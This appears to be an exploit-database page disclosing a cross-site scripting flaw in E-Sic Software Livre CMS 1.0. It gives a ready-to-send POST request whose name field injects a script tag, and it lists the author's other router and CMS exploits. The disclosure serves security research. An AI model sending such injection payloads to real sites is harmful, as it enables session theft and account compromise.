Search for hundreds of thousands of exploits

"E-Sic Software livre CMS - Cross Site Scripting"

Author

Exploit author

"Elber Tavares"

Platform

Exploit platform

php

Release date

Exploit published date

2017-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
Date: 12/10/2017# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-xss.html

O XSS está presente na área de cadastro de solicitante,
onde é possivel injetar códigos pelo input que recebe o nome do usuário

---------------------------------------------------------------------

Url: http://localhost/esic/index/

POST: http://localhost/cadastro/index.php
DATA:
DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
uf=&numero=&complemento=&acao=Salvar
Release DateTitleTypePlatformAuthor
2020-03-02"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)"webappshardware"Elber Tavares"
2020-03-02"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)"webappshardware"Elber Tavares"
2020-03-02"TP LINK TL-WR849N - Remote Code Execution"webappshardware"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - Cross Site Scripting"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - 'f' SQL Injection"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - Autentication Bypass"webappsphp"Elber Tavares"
2017-10-12"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection"webappsphp"Elber Tavares"
2017-09-28"Roteador Wireless Intelbras WRN150 - Autentication Bypass"webappshardware"Elber Tavares"
2017-09-07"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting"webappshardware"Elber Tavares"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/42983/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.